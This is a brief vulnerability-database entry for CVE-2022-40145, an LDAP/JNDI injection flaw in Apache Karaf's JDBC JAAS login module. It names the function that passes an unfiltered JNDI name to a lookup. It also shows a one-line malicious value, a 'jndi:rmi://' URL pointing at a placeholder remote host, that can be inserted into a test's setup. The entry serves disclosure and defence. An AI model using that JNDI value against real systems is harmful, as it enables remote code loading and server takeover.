CVSS: 10.0EPSS: 0%CPEs: 2EXPL: 0CVE-2022-40145 – Apache Karaf: JDBC JAAS LDAP injection
https://notcve.org/view.php?id=CVE-2022-40145
21 Dec 2022 — This vulnerable is about a potential code injection when an attacker has control of the target LDAP server using in the JDBC JNDI URL. The function jaas.modules.src.main.java.porg.apache.karaf.jass.modules.jdbc.JDBCUtils#doCreateDatasource use InitialContext.lookup(jndiName) without filtering. An user can modify `options.put(JDBCUtils.DATASOURCE, "osgi:" + DataSource.class.getName());` to `options.put(JDBCUtils.DATASOURCE,"jndi:rmi://x.x.x.x:xxxx/Command");` in JdbcLoginModuleTest#setup. This is vulnerable ... • https://karaf.apache.org/security/cve-2022-40145.txt • CWE-20: Improper Input Validation CWE-74: Improper Neutralization of Special Elements in Output Used by a Downstream Component ('Injection') •